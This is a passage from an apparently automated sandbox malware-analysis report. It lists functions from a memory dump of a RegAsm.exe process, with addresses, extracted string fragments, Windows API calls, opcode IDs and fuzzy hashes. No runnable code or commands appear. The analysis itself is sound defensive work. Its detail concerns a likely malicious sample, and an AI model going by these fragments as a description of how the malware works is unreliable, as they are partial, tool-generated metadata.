                            • Instruction Fuzzy Hash: 77112435A092009BD700EF09C98072BB7A2EFC9701F68D95ED4C41731AC379DC018786
                            Function 00433F00 Relevance: 3.1, Strings: 2, Instructions: 593COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: =:;8$=:;8
                            • API String ID: 0-1685821102
                            • Opcode ID: 09c02fa877a0dd9dd201d12ed4f947b4b3fd909397c3e99c6c9f7a2f71c4dda4
                            • Instruction ID: 5dc56ea857c707a2cdbb500d520756cfcbc6274e67a8832f5175a0cf84fc226c
                            • Opcode Fuzzy Hash: 09c02fa877a0dd9dd201d12ed4f947b4b3fd909397c3e99c6c9f7a2f71c4dda4
                            • Instruction Fuzzy Hash: AC12CE7460C3419FD714CF29C880B2BBBE1ABD9314F589A2EF59587392D739E805CB4A
                            Function 00419D10 Relevance: 3.0, Strings: 2, Instructions: 475COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: /5$4`[b
                            • API String ID: 0-2702436956
                            • Opcode ID: 013baff0383a566b319f118bdac67757b075b34db97eb51883e69df48240b07a
                            • Instruction ID: 70f3afddac7958c139271eee4c6b5a67b924aadb50313bfbbe43f8dbff695086
                            • Opcode Fuzzy Hash: 013baff0383a566b319f118bdac67757b075b34db97eb51883e69df48240b07a
                            • Instruction Fuzzy Hash: C0D1DB716083009BD714EF18C891A6BB7E1EF9A354F08492EE4C697391E339DD91CB9B
                            Function 00427379 Relevance: 3.0, Strings: 2, Instructions: 462COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: 34t$coS`
                            • API String ID: 0-1298604597
                            • Opcode ID: e14d140d5b94d304583dbcedafa0fe3fdaf090812a4be98a817ad40a20243254
                            • Instruction ID: 54d459f772918474ac6addc90cd2725c818484d601669f7acc20c8008fffc722
                            • Opcode Fuzzy Hash: e14d140d5b94d304583dbcedafa0fe3fdaf090812a4be98a817ad40a20243254
                            • Instruction Fuzzy Hash: CAF1A170208B918BD334CF29D4907A7BBF1AF52704F548A5ED8DB8B781C778A509CB69
                            Function 00410604 Relevance: 2.9, Strings: 2, Instructions: 358COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: V$jc
                            • API String ID: 0-3150959249
                            • Opcode ID: 2d9d36667facf893e37ee7223e1d02249d354b86af205dac86718e72cf5ed3bd
                            • Instruction ID: e1edd307becf10b644a2416f1de8b771c3f4f1659cbf641d249f52a49fe79eab
                            • Opcode Fuzzy Hash: 2d9d36667facf893e37ee7223e1d02249d354b86af205dac86718e72cf5ed3bd
                            • Instruction Fuzzy Hash: EED114715193809BE324CF54DA91BAFF7F5BF85704F04892EF48887291D7B8D8448B5A
                            Function 00411AFA Relevance: 2.8, Strings: 2, Instructions: 291COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: "$>
                            • API String ID: 0-4093753233
                            • Opcode ID: 0cc661997b819a07b09149d686ffc90c62f636f1743c20af66905ce59a324eb9
                            • Instruction ID: 890ebbcf0d1d49ca91fd7b5ccb07784f7fad3a6ba6f8963ee5af9b48a23222dc
                            • Opcode Fuzzy Hash: 0cc661997b819a07b09149d686ffc90c62f636f1743c20af66905ce59a324eb9
                            • Instruction Fuzzy Hash: 3DC115706183809FD360DF14D590BABBBF4EF96308F04482DE5C8872A1E7799899CB5B
                            Function 00414DD8 Relevance: 2.7, Strings: 2, Instructions: 221COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: BA$s}
                            • API String ID: 0-1774735589
                            • Opcode ID: d9c6d5e28c3c6c0b0b210232f97b138277af0bd73aab06d8da642cfc732a8eda
                            • Instruction ID: eb09232f8bb2dc26a2bb3a4f214839490faaf0804e893d8b6298c1d987373f9a
                            • Opcode Fuzzy Hash: d9c6d5e28c3c6c0b0b210232f97b138277af0bd73aab06d8da642cfc732a8eda
                            • Instruction Fuzzy Hash: 507187B040D3408BC7249F25D851A6BB7F1FFD6318F04992EE5C95B391E7399881CB8A
                            Function 00436290 Relevance: 1.8, Strings: 1, Instructions: 504COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: C022
                            • API String ID: 0-2838087854
                            • Opcode ID: 3cb9c0dfe21051adafe97323b1b915316bdbcebbcc2009fbf48f83669270b2cb
                            • Instruction ID: bf756d6882dfd6b2d33f5bf698541d0b68fa311400811cb7083e84a527dba1e5
                            • Opcode Fuzzy Hash: 3cb9c0dfe21051adafe97323b1b915316bdbcebbcc2009fbf48f83669270b2cb
                            • Instruction Fuzzy Hash: B712CF39618351CFC714CF28D89062AB7E2FF9A304F0A8A7DE991873A1D375D951CB86
                            Function 00419AB0 Relevance: 1.7, APIs: 1, Instructions: 242comCOMMON
                            Download Yara Rule
                            APIs
                            • CoCreateInstance.OLE32(0043A538,00000000,00000001,0043A528), ref: 00419AD9
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: CreateInstance
                            • String ID:
                            • API String ID: 542301482-0
                            • Opcode ID: 9155bed6a64725851745264f252c66174f95f4786b82717ca938aff91722c7cd
                            • Instruction ID: a462d6956060b8f6b95ead431053ccb3238380998c3780e831e5491fd2f1adc9
                            • Opcode Fuzzy Hash: 9155bed6a64725851745264f252c66174f95f4786b82717ca938aff91722c7cd
                            • Instruction Fuzzy Hash: 1451C0B16042049BDB209B24CCA6BA773B4FF85368F144519F9858B391F379ED41C76A
                            Function 004214F6 Relevance: 1.7, Strings: 1, Instructions: 472COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: >IVW
                            • API String ID: 0-1461049412
                            • Opcode ID: e9dec708a1131943bf92950f6abd70c888a0a4f1df6f6046ae504163b1f88826
                            • Instruction ID: 238a36525fd961cb4b1886d03bd6cb0cd9d376890d9a1caf94005513cb454a16
                            • Opcode Fuzzy Hash: e9dec708a1131943bf92950f6abd70c888a0a4f1df6f6046ae504163b1f88826
                            • Instruction Fuzzy Hash: 95E188B02093518BD314DF18D4A1B2BBBF1EFA6748F540A0DE1C25B3A1E339D945CB9A
                            Function 004224C0 Relevance: 1.6, Strings: 1, Instructions: 382COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: "
                            • API String ID: 0-123907689
                            • Opcode ID: cc9b0b26bde215a109fc7b93b1f2ac149ee07ffeade0ce33996c7d40f012ed10
                            • Instruction ID: 26c6054b6af2b0b303ab2d525ef43e93fefe723437e04332159c3fb1e67f6267
                            • Opcode Fuzzy Hash: cc9b0b26bde215a109fc7b93b1f2ac149ee07ffeade0ce33996c7d40f012ed10
                            • Instruction Fuzzy Hash: 78C147B2B08320BFD7248E24E55076BB7E5AF84314F98852FE89587382D7B8DD44C796
                            Function 00436EB0 Relevance: 1.5, Strings: 1, Instructions: 295COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: bqC
                            • API String ID: 0-1843633857
                            • Opcode ID: 2f79585747e9766e87e940fe5e801f34e97a41872a5fbe1b4930f1786d690e5d
                            • Instruction ID: b2e0825e8d82e576ce88628202d00c82333138814e3d307433fc2f078b1cad12
                            • Opcode Fuzzy Hash: 2f79585747e9766e87e940fe5e801f34e97a41872a5fbe1b4930f1786d690e5d
                            • Instruction Fuzzy Hash: F4A19B75A0411ACFCB08CFA8D9916AEF7B2FF8A310F295169D951B7351C734AC41CBA8
                            Function 00438990 Relevance: 1.5, Strings: 1, Instructions: 294COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: 7654
                            • API String ID: 0-4024152101
                            • Opcode ID: b1bda44f3dfe3cf90289f7c3942947c15e04987df2fba967d7be98a53bb92d88
                            • Instruction ID: f63dbfcae968d17017cc9ad44279db2d5e0e8f7cd9c359af93422399609b9524
                            • Opcode Fuzzy Hash: b1bda44f3dfe3cf90289f7c3942947c15e04987df2fba967d7be98a53bb92d88
                            • Instruction Fuzzy Hash: 17A1CF746083429BC714DF18C890A2BF3E1EF89750F15A92DF9858B351EB39EC51CB9A
                            Function 004304D0 Relevance: 1.5, Strings: 1, Instructions: 282COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4`[b
                            • API String ID: 0-3962175265
                            • Opcode ID: f555747e4483e726bf046bd01cc4277a6f9883d95babf14855832f60426e55c6
                            • Instruction ID: f55d4bbbd932662b1c1391e4672e24b421ff35cde8c615fdae91bcb2b69d29d0
                            • Opcode Fuzzy Hash: f555747e4483e726bf046bd01cc4277a6f9883d95babf14855832f60426e55c6
                            • Instruction Fuzzy Hash: 3E91C135218201DFD304DF24D4A062EB7E2FFCA304F149A2DE58A87391D738E865CB9A
                            Function 00433B30 Relevance: 1.5, Strings: 1, Instructions: 208COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: =:;8
                            • API String ID: 0-508151936
                            • Opcode ID: b24aca6d57484efadc082630db2b606cf9c26ee2f3b96e9dd073d815acb02f78
                            • Instruction ID: 0c79e7b47b4fcf08a059478184edb2dd9af8b4c18f3ea349e2d4faf3ad10370f
                            • Opcode Fuzzy Hash: b24aca6d57484efadc082630db2b606cf9c26ee2f3b96e9dd073d815acb02f78
                            • Instruction Fuzzy Hash: 0761C236A083509FD710DF19C94062BB7E5EF89715F19A92EE8D497351C379EE008B8A
                            Function 004304E0 Relevance: 1.5, Strings: 1, Instructions: 202COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4`[b
                            • API String ID: 0-3962175265
                            • Opcode ID: 3ecad00d4e5b4bd388415d06cab6d27bd884d4f6568a1758927acd50d69f04d5
                            • Instruction ID: 1441085af3f247346d20adb243f1ec892e6d9f8e5cb581ce2cc9f21d1c8ddd62
                            • Opcode Fuzzy Hash: 3ecad00d4e5b4bd388415d06cab6d27bd884d4f6568a1758927acd50d69f04d5
                            • Instruction Fuzzy Hash: C261BC74208301ABE304DF19D8A1A2BB7E1FFCA304F549A2DF5C587291D739E915CB9A
                            Function 00435FC1 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: =:;8
                            • API String ID: 2994545307-508151936
                            • Opcode ID: 8976f9788e02a554f8b59b30c081b552809f7c9a598e61f68d0835fe308c507a
                            • Instruction ID: 8ed45df670c347d02ddb172104c8c6409f03e466944de908c70c6c5d3a00bef9
                            • Opcode Fuzzy Hash: 8976f9788e02a554f8b59b30c081b552809f7c9a598e61f68d0835fe308c507a
                            • Instruction Fuzzy Hash: C4117F74208641EBC719DB09C5A1A3FB7F1AB99300F65AA2EE1C3173A6C3359851CB5A
                            Function 00408CF0 Relevance: .8, Instructions: 823COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6e5a4569a3be50ab0dfe2a6f18c013bedc1704ded0f4c5de6a012bf4b6bea280
                            • Instruction ID: 0184b0cfc5f8f5ed7a3f5dda44b3be7059e5ffe5f7651fcdf06a68ee7a4bee3a
                            • Opcode Fuzzy Hash: 6e5a4569a3be50ab0dfe2a6f18c013bedc1704ded0f4c5de6a012bf4b6bea280
                            • Instruction Fuzzy Hash: 0152A3326087118BC724DF19D8802ABB3E2FFD4314F19893ED995A7382D739AD55C786
                            Function 00407180 Relevance: .4, Instructions: 436COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b47adcd1308dab6da5ad12959e32fee7fe1ebfd13b779da2a397cd43afdf7b5c
                            • Instruction ID: a1aeae590f1f99a438b30b969fa1a9eff281325304b30b06c1913746a920e03e
                            • Opcode Fuzzy Hash: b47adcd1308dab6da5ad12959e32fee7fe1ebfd13b779da2a397cd43afdf7b5c
                            • Instruction Fuzzy Hash: 30F190726087409FC724CF29C98162BFBE2EFD5300F05882EE4DA57791D679E944CB56
                            Function 0041F3E2 Relevance: .4, Instructions: 377COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9e8f6222deee5675c291c625eab9af2fb7e5c9a2c65f5d30e88a36fb6a996c0c
                            • Instruction ID: 4ed1d1d926b798b7414cbd59f3c14c411362d491c0abc180a86c889255f534c5
                            • Opcode Fuzzy Hash: 9e8f6222deee5675c291c625eab9af2fb7e5c9a2c65f5d30e88a36fb6a996c0c
                            • Instruction Fuzzy Hash: 15D10231A09380CFD310CF39D85179ABBE2AF9A320F19866DF4A4573E1D33599468B59
                            Function 0040F340 Relevance: .3, Instructions: 280COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 97f80c7a7d0ea878251f5a23c6f9b32b7fa82ab853bd60a1a025ed517675784d
                            • Instruction ID: 49e201864f775cce17e585cacd26190e4eaaf64f5be1281620f47f109bdda163
                            • Opcode Fuzzy Hash: 97f80c7a7d0ea878251f5a23c6f9b32b7fa82ab853bd60a1a025ed517675784d
                            • Instruction Fuzzy Hash: C6C1E2B05093809BE324DF58DA91B5FB7E1BF85704F044D6DE88897291E378D809DB5A
                            Function 004211E3 Relevance: .3, Instructions: 259COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 42b8da2b171821e85473a86d46ef22646ef5790da619b77be1407a04a2cfb7ce
                            • Instruction ID: a307ac9e41e0c00410ed41831f5273eb48251c3f1a94b60f93cfe2d66b37fe2d
                            • Opcode Fuzzy Hash: 42b8da2b171821e85473a86d46ef22646ef5790da619b77be1407a04a2cfb7ce
                            • Instruction Fuzzy Hash: AA810F706083618BD724DF14D89076BB3F1FFA5348F448A1DE8C55B3A1E3399A45CB9A
                            Function 00421037 Relevance: .1, Instructions: 135COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 540074b74cacda2836dac7fb33db96cfdd19248702a528b3533d0c4c4ddf1b25
                            • Instruction ID: 3eb3eaace6e43c36cf789eb0a38e5129a85f9b991b0ebf560480ffa2aca2e3d9
                            • Opcode Fuzzy Hash: 540074b74cacda2836dac7fb33db96cfdd19248702a528b3533d0c4c4ddf1b25
                            • Instruction Fuzzy Hash: 7B4123706083558BD724DF14D8A07ABB3F0FF95344F048A0DE9C95B391E3389A45CB8A
                            Function 0042A0C0 Relevance: .1, Instructions: 109COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ae74f865641c54ea56641548f2395015516c3dc3645dc1b1e714fee7b2dc3f05
                            • Instruction ID: b30377f06e2d972938d569d47e68cecfd62bff9d031101de241beeb7d680070e
                            • Opcode Fuzzy Hash: ae74f865641c54ea56641548f2395015516c3dc3645dc1b1e714fee7b2dc3f05
                            • Instruction Fuzzy Hash: D78160B044A3858BD3759F05C66C3CFBAE4FB89348F50A92E849C5B261D7B9114DCF8A
                            Function 00403490 Relevance: .1, Instructions: 95COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 78eb154f3a364d67caaa4b826fc9b45e6fce4ea54130b67e56261acce52a6199
                            • Instruction ID: 153bbfb705955bddebf4453a9b08ce1bed120ffb0325fbb1452e0b0ed2e671af
                            • Opcode Fuzzy Hash: 78eb154f3a364d67caaa4b826fc9b45e6fce4ea54130b67e56261acce52a6199
                            • Instruction Fuzzy Hash: 6731EC706042009FC7119E19C880927BBE5EFC5319F18893EF899AB3D1D339EE42CB4A
                            Function 0042FDAE Relevance: .1, Instructions: 75COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cfe7fb868f18e682bb429867217c1f2b9a79c874e2f0c68ea02a1945da5c4e29
                            • Instruction ID: 508c8c5ded401c672295e8b471583c828acc73a282cfb86f99c435dddf3fc29c
                            • Opcode Fuzzy Hash: cfe7fb868f18e682bb429867217c1f2b9a79c874e2f0c68ea02a1945da5c4e29
                            • Instruction Fuzzy Hash: 1C214D74205B408FD725CF54C694A52BBF2EF46B10B48C96DD8AA8BB66D33CF806CB15
                            Function 0040EF2C Relevance: .1, Instructions: 70COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ca3fd490e5bc4ef59f2fdb7f05247fbad9cd4ea13dbe844f8a2395f7f835d31d
                            • Instruction ID: 5120ac3ab4c54ad5cae238c04deae267a5efcc811defd7bd49abe6fb93fe7d63
                            • Opcode Fuzzy Hash: ca3fd490e5bc4ef59f2fdb7f05247fbad9cd4ea13dbe844f8a2395f7f835d31d
                            • Instruction Fuzzy Hash: 3F21047051A3819BE314CF25DA90A6FFBF2FFD6704F04892EE48897281D778D8158B1A
                            Function 0042BFF0 Relevance: .1, Instructions: 64COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                            • Instruction ID: b8da7e386dd71cb07b4cdf537d59fd27ce7c56af6912d90495ca24ae372a0b79
                            • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                            • Instruction Fuzzy Hash: A4112933B051E04EC3168D7C944056ABFA30A93274B9983DAF4B59B2D2D6278D8F8399
                            Function 00421F00 Relevance: .1, Instructions: 63COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1af23d53004e8e458b385bf699c051976793f1577a7356e3ebeeeeb76659a21f
                            • Instruction ID: d55d15d7595aba56963e0174aa718516af234923a89c73d55e8d22a0efc5e8d7
                            • Opcode Fuzzy Hash: 1af23d53004e8e458b385bf699c051976793f1577a7356e3ebeeeeb76659a21f
                            • Instruction Fuzzy Hash: 4F01D4F270031187D720AE11A9C0B27F2A86FA4748F5A443EE92457746DB7DEC05C69D
                            Function 00413810 Relevance: .0, Instructions: 38COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2005448fb962e344b90a711803d7ec80157990eb154bd87bdd857053f3702c6d
                            • Instruction ID: 234ff9d9b5c662ad828a0bf9ed49ceaf15d4a9aacb052a1b1d7134cb63ec8cbc
                            • Opcode Fuzzy Hash: 2005448fb962e344b90a711803d7ec80157990eb154bd87bdd857053f3702c6d
                            • Instruction Fuzzy Hash: D5F05CB1A0411017DF229F449CC0F77BBDCCB87318F09043AF84553202D275A885C3EA
                            Function 00431E90 Relevance: .0, Instructions: 26COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cc8815e1caefdcabb1c8feca523002050e4654cc1546fc6923db71fa5b2fcc4d
                            • Instruction ID: 998158e79e8f3131129d170c08f15690ff401dbd9df2d3344eadf01334e398ae
                            • Opcode Fuzzy Hash: cc8815e1caefdcabb1c8feca523002050e4654cc1546fc6923db71fa5b2fcc4d
                            • Instruction Fuzzy Hash: C6E0CD7BB15611065764CE169801677F3E1EAC6712F4CF52FD442D3204D238C8404164
                            Function 0042B380 Relevance: 84.1, APIs: 1, Strings: 47, Instructions: 142memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 599 42b380-42b3b3 600 42b3be-42b3c8 599->600 601 42b405-42b558 SysAllocString 600->601 602 42b3ca-42b403 call 42c1e0 600->602 603 42b55d-42b568 601->603 602->600 603->603 605 42b56a 603->605 607 42b575-42b57f 605->607 608 42b581-42b5ba call 42c200 607->608 609 42b5bc-42b62b 607->609 608->607
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: AllocString
                            • String ID: $!$#$%$'$($)$+$-$/$0$0$1$2$3$5$7$9$;$<$=$?$@$B$D$G$G$I$K$O$O$Q$Q$Y$\$\$]$]$a$i$k$m$n$n$n$o$v
                            • API String ID: 2525500382-793184498
                            • Opcode ID: 23e8274fec87829ffba6f5e6b95b8a30e7f479b7a999ae8e345cf56e89d79c6b
                            • Instruction ID: ab6d4a66087807c94fba54b8c92083be051c96d3f11d3922308170b0da697282
                            • Opcode Fuzzy Hash: 23e8274fec87829ffba6f5e6b95b8a30e7f479b7a999ae8e345cf56e89d79c6b
                            • Instruction Fuzzy Hash: 4781A46010C7C1CEE322DB68904875FFFE15BA6308F58499EE1D94B392C3BA8549CB67
                            Function 0042AAF7 Relevance: 84.1, APIs: 1, Strings: 47, Instructions: 137memoryCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: AllocString
                            • String ID: $!$#$%$'$($)$+$-$/$0$0$1$2$3$5$7$9$;$<$=$?$@$B$D$G$G$I$K$O$O$Q$Q$Y$\$\$]$]$a$i$k$m$n$n$n$o$v
                            • API String ID: 2525500382-793184498
                            • Opcode ID: 53fb27f28680d6e9c0932f9d34826aae36b618f713e3d4e2bd4ed44009e92b19
                            • Instruction ID: 9760f52f5b88fc7437d0571b68b5bfac43b576b162bcc06f57bfc340682594c3
                            • Opcode Fuzzy Hash: 53fb27f28680d6e9c0932f9d34826aae36b618f713e3d4e2bd4ed44009e92b19
                            • Instruction Fuzzy Hash: 0F81A06010C7C0CEE322DB68D04875FBFE15BA6348F58499DE1E95B392C3BA8549CB67
                            Function 00428F72 Relevance: 66.7, APIs: 1, Strings: 37, Instructions: 157memoryCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
